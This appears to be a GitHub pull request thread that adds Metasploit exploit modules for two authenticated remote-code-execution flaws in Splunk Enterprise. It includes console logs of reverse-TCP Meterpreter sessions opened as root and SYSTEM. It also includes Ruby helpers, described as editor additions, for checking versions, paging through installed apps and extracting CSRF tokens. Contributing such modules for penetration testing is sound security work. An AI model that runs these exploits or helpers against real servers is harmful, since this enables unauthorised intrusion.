Conversation


@vognik vognik commented Dec 12, 2025

CVE-2022-43571

Vulnerability Details

This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.

An attacker can inject arbitrary Python code into style parameters, such as the fillColor or lineColor of a sparkline element within a Splunk SimpleXML dashboard.
The malicious code is executed when a user triggers the PDF export function for the dashboard.

The affected versions include any release prior to 8.1.12, as well as versions 8.2.0 through 8.2.9 and 9.0.0 through 9.0.2.

Module Information

Module path: modules/exploits/multi/http/splunk_auth_rce_cve_2022_43571.rb
Platform: Linux/Unix/Windows

References

Test Output

Linux

msf6 > use multi/http/splunk_auth_rce_cve_2022
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RHOSTS 192.168.19.139
RHOSTS => 192.168.19.139
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RPORT 8000
RPORT => 8000
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set PASSWORD password123
PASSWORD => password123
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
[+] The target appears to be vulnerable. Exploitable version found: 8.2.4
[*] Sending stage (24772 bytes) to 192.168.19.139
[*] Meterpreter session 2 opened (192.168.19.130:4444 -> 192.168.19.139:59524) at 2025-12-12 15:11:44 -0500

meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: root

Windows

msf6 > use multi/http/splunk_auth_rce_cve_2022_43571
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RHOSTS 192.168.19.137
RHOSTS => 192.168.19.137
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set RPORT 8000
RPORT => 8000
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > set PASSWORD password123
PASSWORD => password123
msf6 exploit(multi/http/splunk_auth_rce_cve_2022_43571) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
[+] The target appears to be vulnerable. Exploitable version found: 8.2.6
[*] Sending stage (24772 bytes) to 192.168.19.137
[*] Meterpreter session 3 opened (192.168.19.130:4444 -> 192.168.19.137:62128) at 2025-12-12 15:21:53 -0500

meterpreter > sysinfo
Computer        : DESKTOP-vognik
OS              : Windows 10 (Build 19044)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

CVE-2024-36985

Vulnerability Details

This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise (splunk_archiver application).

The flaw is rooted in the unsafe use of a Splunk lookup function, specifically | copybuckets, within the splunk_archiver application, which ultimately leads to the execution of the helper script sudobash with attacker-controlled arguments.

The affected versions include any release prior to 9.0.10, as well as versions 9.1.2 through 9.1.5 and 9.2.0 through 9.2.2.

Module Information

Module path: modules/exploits/linux/http/splunk_auth_rce_cve_2024_36985.rb
Platform: Linux/Unix

References

Test Output

msf6 > use linux/http/splunk_auth_rce_cve_2024_36985
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set RHOSTS 192.168.19.139
RHOSTS => 192.168.19.139
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set RPORT 8000
RPORT => 8000
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set FETCH_SRVPORT 8090
FETCH_SRVPORT => 8090
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > set PASSWORD password123
PASSWORD => password123
msf6 exploit(linux/http/splunk_auth_rce_cve_2024_36985) > run

[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password123'
[+] The target appears to be vulnerable. Exploitable version found: 8.2.4, splunk_archiver app is enabled
[*] Sending stage (3045380 bytes) to 192.168.19.139
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.139:55936) at 2025-12-12 15:04:44 -0500

meterpreter > sysinfo
Computer     : 192.168.19.139
OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
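
The two affected-version statements above are the kind of thing a module's check method has to get right, and string comparison gets them wrong (8.2.10 sorts below 8.2.9 as text). The following Ruby is an added example by the editor, not code from this PR or from the two modules: it encodes the ranges exactly as the descriptions state them using Gem::Version (Metasploit's Rex::Version is a subclass with the same ordering), and adds the splunk_archiver precondition that the CVE-2024-36985 check output reports. The constant and function names (AFFECTED, check_splunk, vulnerable_to?) are the example's own.

```ruby
# Added example: version check for the two Splunk CVEs in this PR.
# Ranges come from the affected-version statements in the module descriptions;
# the archiver_enabled condition for CVE-2024-36985 follows the module's check output.
require 'rubygems' # Gem::Version (Metasploit's Rex::Version subclasses it)

def ver(s)
  Gem::Version.new(s.to_s.strip)
end

# Range#cover? on Gem::Version gives numeric ordering (8.2.10 > 8.2.9,
# which a plain string comparison would get wrong). "..." excludes the upper bound.
AFFECTED = {
  'CVE-2022-43571' => [
    (ver('0')...ver('8.1.12')),     # any release prior to 8.1.12
    (ver('8.2.0')..ver('8.2.9')),   # 8.2.0 through 8.2.9
    (ver('9.0.0')..ver('9.0.2'))    # 9.0.0 through 9.0.2
  ],
  'CVE-2024-36985' => [
    (ver('0')...ver('9.0.10')),     # any release prior to 9.0.10
    (ver('9.1.2')..ver('9.1.5')),   # 9.1.2 through 9.1.5
    (ver('9.2.0')..ver('9.2.2'))    # 9.2.0 through 9.2.2
  ]
}.freeze

# Returns :appears (version in range and preconditions met), :safe, or :unknown
# when the version is missing/unparseable or a required precondition was not established.
def check_splunk(cve, version_string, archiver_enabled: nil)
  return :unknown if version_string.nil? || version_string.to_s.strip.empty?

  version = ver(version_string)
  in_range = AFFECTED.fetch(cve).any? { |range| range.cover?(version) }
  return :safe unless in_range

  # CVE-2024-36985 additionally needs the splunk_archiver app enabled on the target.
  if cve == 'CVE-2024-36985'
    return :unknown if archiver_enabled.nil?
    return :safe unless archiver_enabled
  end
  :appears
rescue ArgumentError # Gem::Version raises on malformed version strings
  :unknown
end

def vulnerable_to?(cve, version_string, archiver_enabled: nil)
  check_splunk(cve, version_string, archiver_enabled: archiver_enabled) == :appears
end

if __FILE__ == $PROGRAM_NAME
  # The versions from the test output above; the result shows the check the module ran.
  [['CVE-2022-43571', '8.2.4', {}],
   ['CVE-2022-43571', '8.2.6', {}],
   ['CVE-2024-36985', '8.2.4', { archiver_enabled: true }]].each do |cve, v, opts|
    puts "#{cve} #{v}: #{check_splunk(cve, v, **opts)}"
  end
end
```

The three-state result matters for AutoCheck: a banner that could not be read, or an archiver status that was never queried, should report unknown rather than silently passing as safe.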


vognik commented Dec 15, 2025

There are a few problems:

  1. When you execute | archivebuckets forcerun=1, the system takes a few seconds to drop sudobash. It seems like I need to add a sleep
  2. The index _internal can be empty
  3. The get_apps function can't retrieve the full list of apps because it doesn't support pagination
  4. When Splunk is running behind a reverse proxy, the suffix of the splunkweb_csrf_token_ cookie does not always match RHOST
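
Problems 3 and 4 in the comment above have a mechanical fix that is worth spelling out. The following Ruby is an added example by the editor, not code from this PR: it pages through a Splunk REST collection such as /services/apps/local with the count and offset query parameters, reading the items from "entry" and the total from "paging.total" (key names taken from Splunk's documented output_mode=json format, to be verified against a live instance), and it selects the CSRF cookie by its splunkweb_csrf_token_ prefix instead of rebuilding the cookie name from the target host or port. The sample responses and Set-Cookie headers are constructed, and the fetcher block stands in for send_request_cgi; function names are the example's own.

```ruby
# Added example: robust app enumeration and CSRF cookie lookup against Splunk Web.
# Not code from the PR; the fetcher block stands in for Metasploit's send_request_cgi.
require 'json'

# Page through a Splunk REST collection (e.g. /services/apps/local?output_mode=json)
# using the count/offset query parameters. The JSON body carries the items in
# "entry" and a "paging" object with "total" (assumed key names from Splunk's
# documented JSON output). Yields (offset, page_size) and expects the parsed body back.
def collect_all_entries(page_size: 30)
  entries = []
  offset = 0
  loop do
    body = yield(offset, page_size)
    page = body.fetch('entry', [])
    entries.concat(page)
    total = body.dig('paging', 'total') || entries.length
    offset += page.length
    # Stop on an empty page too, so a server that ignores offset cannot loop forever.
    break if page.empty? || offset >= total
  end
  entries
end

def splunk_app_names(page_size: 30, &fetch_page)
  collect_all_entries(page_size: page_size, &fetch_page).map { |e| e['name'] }
end

# True when splunk_archiver is installed and not disabled. "content.disabled" is the
# enable flag in an apps/local entry (assumption; verify on a live host).
def archiver_enabled?(page_size: 30, &fetch_page)
  collect_all_entries(page_size: page_size, &fetch_page).any? do |e|
    e['name'] == 'splunk_archiver' && !e.dig('content', 'disabled')
  end
end

# Pick the CSRF cookie by prefix. Splunk Web names it splunkweb_csrf_token_<suffix>
# (the suffix is normally the web port, e.g. 8000); behind a reverse proxy the suffix
# need not match what the client connected to, so do not rebuild the name from RHOST/RPORT.
# Returns [cookie_name, token] or nil. The token is the value for the X-Splunk-Form-Key header.
def csrf_token_from_set_cookie(set_cookie_headers)
  Array(set_cookie_headers).each do |header|
    name, value = header.split(';', 2).first.strip.split('=', 2)
    return [name, value] if name.start_with?('splunkweb_csrf_token_')
  end
  nil
end

# Constructed sample data (not captured from a real instance): five apps served
# two per page, so the last page is short and the pagination loop has to cope.
SAMPLE_APPS = [
  ['launcher', false], ['search', false], ['splunk_archiver', false],
  ['splunk_monitoring_console', false], ['learned', true]
].freeze

def sample_fetch(offset, count)
  slice = SAMPLE_APPS[offset, count] || []
  {
    'entry' => slice.map { |name, disabled| { 'name' => name, 'content' => { 'disabled' => disabled } } },
    'paging' => { 'total' => SAMPLE_APPS.length, 'perPage' => count, 'offset' => offset }
  }
end

# Constructed Set-Cookie headers: the CSRF cookie suffix (8443) deliberately differs
# from the port the client would have used (8000), as behind a reverse proxy.
SAMPLE_SET_COOKIE = [
  'session_id_8000=deadbeef; Path=/; HttpOnly',
  'splunkweb_csrf_token_8443=1234567890123456; Path=/'
].freeze

if __FILE__ == $PROGRAM_NAME
  names = splunk_app_names(page_size: 2) { |o, c| sample_fetch(o, c) }
  puts names.inspect
  puts csrf_token_from_set_cookie(SAMPLE_SET_COOKIE).inspect
end
```

In a module the block passed to splunk_app_names would issue the GET with count and offset as query parameters and return JSON.parse(res.body); the prefix match on the cookie name also covers the case where the proxy rewrites the port in the cookie name.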

@vognik vognik marked this pull request as draft December 15, 2025 10:24
@vognik vognik marked this pull request as ready for review December 18, 2025 16:50